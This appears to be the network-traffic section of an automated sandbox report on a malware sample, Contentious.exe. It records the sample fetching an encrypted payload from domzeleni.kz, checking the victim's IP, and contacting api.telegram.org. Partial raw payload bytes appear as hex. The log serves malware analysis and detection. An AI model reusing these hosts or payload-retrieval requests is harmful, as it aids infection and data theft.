                                          Jul 25, 2024 09:56:59.017314911 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.019277096 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.019313097 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167088032 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167195082 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167306900 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.167748928 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.171415091 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.172591925 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.176822901 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:59.176882029 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.177613020 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:59.177685022 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.177807093 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.182528019 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:00.643740892 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:00.646431923 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.646481037 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:00.646560907 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.647186041 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.647197962 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:00.685147047 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:01.142071962 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.144854069 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:01.144891024 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269419909 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269666910 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269736052 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:01.270793915 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:06.912273884 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:06.917759895 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:06.917870998 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:06.920337915 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.920388937 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:06.920466900 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.921019077 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.921031952 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.555932999 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.556080103 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.558072090 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.558090925 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.558332920 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.559920073 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.604506969 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.604892015 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.604907990 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855132103 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855304956 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855400085 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.856005907 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:54.658999920 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:54.660269976 CEST4974080192.168.2.4158.101.44.242

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 25, 2024 09:56:37.145128012 CEST6341253192.168.2.41.1.1.1
                                          Jul 25, 2024 09:56:37.404407024 CEST53634121.1.1.1192.168.2.4
                                          Jul 25, 2024 09:56:43.295393944 CEST5439753192.168.2.41.1.1.1
                                          Jul 25, 2024 09:56:43.302406073 CEST53543971.1.1.1192.168.2.4
                                          Jul 25, 2024 09:56:44.880415916 CEST5489453192.168.2.41.1.1.1
                                          Jul 25, 2024 09:56:44.888578892 CEST53548941.1.1.1192.168.2.4
                                          Jul 25, 2024 09:57:06.912903070 CEST4920853192.168.2.41.1.1.1
                                          Jul 25, 2024 09:57:06.919586897 CEST53492081.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 25, 2024 09:56:37.145128012 CEST192.168.2.41.1.1.10x7de6Standard query (0)domzeleni.kzA (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.295393944 CEST192.168.2.41.1.1.10xf222Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:44.880415916 CEST192.168.2.41.1.1.10xb28fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:57:06.912903070 CEST192.168.2.41.1.1.10x180eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 25, 2024 09:56:37.404407024 CEST1.1.1.1192.168.2.40x7de6No error (0)domzeleni.kz185.98.5.168A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:43.302406073 CEST1.1.1.1192.168.2.40xf222No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:44.888578892 CEST1.1.1.1192.168.2.40xb28fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:56:44.888578892 CEST1.1.1.1192.168.2.40xb28fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                          Jul 25, 2024 09:57:06.919586897 CEST1.1.1.1192.168.2.40x180eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • domzeleni.kz
                                          • reallyfreegeoip.org
                                          • api.telegram.org
                                          • checkip.dyndns.org

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449737158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:43.313987970 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:56:44.039083958 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:43 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: cd6a441cb22fb83a5d07a2459837aec3
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 25, 2024 09:56:44.043277025 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 25, 2024 09:56:44.221239090 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:44 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 8ea0e8ef1a59babbf2f692c6a5c4631f
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 25, 2024 09:56:45.821000099 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 25, 2024 09:56:47.189729929 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:47 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: a7b2eefdd9ba5e083c1d431a9c25038a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449740158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:47.807820082 CEST127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jul 25, 2024 09:56:49.885149002 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 25, 2024 09:56:49.886353970 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                          Jul 25, 2024 09:56:50.421607971 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.449743158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:51.110867023 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:56:52.869508028 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 2e0b6dddf050cc05399e028d141ac0fa
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.449745158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:53.599736929 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:56:55.177944899 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:55 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 5f51251e3990569865e9321feb64755b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.449747158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:55.810894012 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:56:57.163333893 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 7d1e1991430a35aac87dea97021faf2d
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449749158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:57.777391911 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:56:58.525434971 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:58 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: a792482f8bae1db13e788de32e8be5a4
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.449751158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 25, 2024 09:56:59.177807093 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 25, 2024 09:57:00.643740892 CEST320INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:57:00 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 72783c58bb9403e2782fe626730b961b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449736185.98.5.1684437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:41 UTC182OUTGET /image/bwSNbczRiJIuD15.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: domzeleni.kz
                                          Cache-Control: no-cache
                                          2024-07-25 07:56:41 UTC341INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 25 Jul 2024 07:56:41 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 133696
                                          Last-Modified: Thu, 25 Jul 2024 07:22:10 GMT
                                          Connection: close
                                          Cache-Control: max-age=604800
                                          Expires: Thu, 01 Aug 2024 07:56:41 GMT
                                          ETag: "66a1fd22-20a40"
                                          X-Powered-By: PleskLin
                                          Accept-Ranges: bytes
                                          2024-07-25 07:56:41 UTC16043INData Raw: dd bb b6 79 c9 42 8f be ec 79 9e e2 ee 50 2c 1f 53 3a e3 f4 85 a2 f1 17 60 e2 ce 6e 62 ee 58 09 95 64 57 8f 5d 37 fb 34 30 f7 ab 27 46 79 51 f5 ed ff 89 11 8c 45 bf 97 14 1c fc 32 14 1f f4 01 3d 50 ad 91 33 93 f9 c3 3e b5 09 13 8a 1c 19 84 0a 5a 79 93 eb 83 67 5d 30 b2 c5 b8 65 02 cd 1d fd b8 2f 16 59 4e a1 94 70 42 5a d6 4e 60 c6 79 1f 52 3e 78 39 ad 0d 1f fe 1d b5 48 2d d8 53 47 ac d6 02 68 76 ee e9 2e e2 1d cc 9f cd 51 ff 8c 0c a6 bb 50 c4 66 e4 f2 fd c7 29 89 01 65 51 14 a6 c0 aa 17 3e 10 de f8 85 91 9c f5 e9 8c 87 f1 ad c7 ef 8d a7 6b 63 d6 c8 8c 2b 40 36 6a e9 8f 6e 27 7f 65 b5 89 0b 88 e4 5d 18 24 db 25 a6 ff 9a a2 74 50 00 ec d1 d1 b8 10 a0 1b 27 9e db 1b d0 b0 ac 48 b9 0d a1 91 05 1c 5b f2 4c e7 91 74 cc a2 dd 2d 81 ac b6 d8 83 bf d5 d9 21 54 b8
                                          Data Ascii: yByP,S:`nbXdW]740'FyQE2=P3>Zyg]0e/YNpBZN`yR>x9H-SGhv.QPf)eQ>kc+@6jn'e]$%tP'H[Lt-!T
                                          2024-07-25 07:56:41 UTC16384INData Raw: 9d 43 13 75 e9 bb 90 a6 4e 51 24 eb 83 6d 29 f4 b2 c5 b9 6e 02 ca 6f ae af 2f 66 36 f6 a1 94 7a 42 5d a8 65 60 c6 7d 61 7e 3e 78 3d de b4 1f fe 17 da f2 ad d8 59 47 8a 4b b8 66 7c 47 6d a3 c3 a5 cc f6 16 02 f8 f8 65 a5 39 05 a1 21 32 80 9c a0 ab cf 78 79 70 6d d2 90 6a 57 07 1c 8e 96 a5 fc 50 f0 b7 b1 5a d3 c0 d8 29 cd 92 18 65 dc ec 88 89 65 2a 18 b6 93 3e 12 dd 4d 82 88 08 82 43 51 8f 42 df 0d e5 ff 9a a4 1b 28 e0 ec d9 dc b4 19 7e 72 4d 05 61 1b d0 ae ac 48 be 62 1d 91 bb 04 54 fb 44 d1 99 fa a5 ed 62 2d 81 a6 f6 d1 ec ff d5 d9 2b 56 66 80 40 03 bc 3f 5b de cd 82 0b 25 be de 7e 3b 9d ba 58 92 36 47 e0 ab 97 2d 3f ab 2a 0d 7d 09 77 a5 9f a4 61 f7 fa fc af 4b 68 e4 71 03 c0 4b 27 e1 42 b6 3f 9c 25 02 eb 45 36 32 8f b5 7f 1d 2b e1 6c 10 32 49 dc 0f c5 1b
                                          Data Ascii: CuNQ$m)no/f6zB]e`}a~>x=YGKf|Gme9!2xypmjWPZ)ee*>MCQB(~rMaHbTDb-+Vf@?[%~;X6G-?*}waKhqK'B?%E62+l2I
                                          2024-07-25 07:56:42 UTC16384INData Raw: a6 d0 f0 91 14 b8 f6 e1 1d 11 c8 55 cd d5 fa 86 9e 71 6a 68 74 69 c2 56 6c aa 64 09 6d b7 e2 c0 ef 29 71 60 83 89 55 46 4d 0d 76 07 08 bb 18 7c e4 d8 00 1c d4 ba dc e6 87 1d c0 aa e5 a0 35 01 82 02 21 96 99 3d 0c 95 8e b0 96 b8 0a 5b b0 8e 93 fe 2d 79 a0 91 20 c4 4d cf 2d 34 2b 16 ba 25 2d 2e 5d f3 be d4 f9 8a 22 21 f0 ba c7 03 9e 0a 7e 70 98 f0 2d c7 b1 6e f2 4a c6 f0 4a 31 8b 05 a8 d0 61 9a 4a cc d0 a0 1f 0e d7 58 a9 6a e0 ed a6 eb 20 69 b0 50 e4 99 ff bc 76 59 de e0 6f 97 13 21 6e 67 59 50 35 ed b7 b9 a3 3e 78 ce 1a 14 d3 4c 82 e5 46 07 cf 30 27 c3 26 5b 61 7e cc 46 5c ef ff b9 06 5f 29 2c d0 f9 d2 78 a7 21 3a 87 e0 ae 7b 4e 86 11 cc 47 7b 1b a8 81 4d 4e dc c8 10 a4 84 a0 96 91 b3 31 93 38 0e 39 4c 7d d3 17 2c e3 c1 a7 47 3c 35 c4 7c 9c 4b 37 7d 05 84
                                          Data Ascii: UqjhtiVldm)q`UFMv|5!=[-y M-4+%-.]"!~p-nJJ1aJXj iPvYo!ngYP5>xLF0'&[a~F\_),x!:{NG{MN189L},G<5|K7}
                                          2024-07-25 07:56:42 UTC16384INData Raw: e6 e6 5b e3 f6 27 cb 18 72 50 07 bc af 59 01 f3 bb eb 8a d7 65 98 1f f3 43 dc a9 34 11 d7 ea b7 b1 aa f0 63 d2 57 d0 57 c6 d7 23 72 ab 5c 33 c7 7c 5a 06 ae 4c 3e 9e 74 72 11 4b 3c a2 5f e9 75 fe 59 c6 be 83 41 96 df ef 8b 6b 58 39 1b 75 47 a7 52 10 33 6c d9 b3 28 ae 05 d3 ee 4b e5 bf f4 81 fe 22 81 3a dd e3 fe 07 a5 be 5a 59 44 c9 e5 b9 92 b5 69 f4 6d ce 7b 7f d6 3c 28 ba 67 73 98 a2 0a ca 36 1d bd 36 ba 07 f9 3a 06 48 c5 0e a0 98 51 d2 b7 ad a1 16 4e ce 45 1d 14 db ef dc c9 5e 1a 86 c4 9e c8 f0 a3 82 12 45 96 bb 55 bd 50 64 80 3a c9 7a 35 99 ed 8a 60 b7 72 a8 be 9e 49 ba 1b f8 d5 ae ad f2 03 48 f5 03 9c 81 26 a2 0f a2 0c 97 db 72 7c 8e 83 02 78 80 c0 e8 9a b7 bf f1 90 95 85 e1 19 b8 ff d1 f1 cd 85 b8 76 25 f0 1b 6b c5 ec d2 0b 65 4b f2 5a 1a 27 b3 48 d8
                                          Data Ascii: ['rPYeC4cWW#r\3|ZL>trK<_uYAkX9uGR3l(K":ZYDim{<(gs66:HQNE^EUPd:z5`rIH&r|xv%keKZ'H
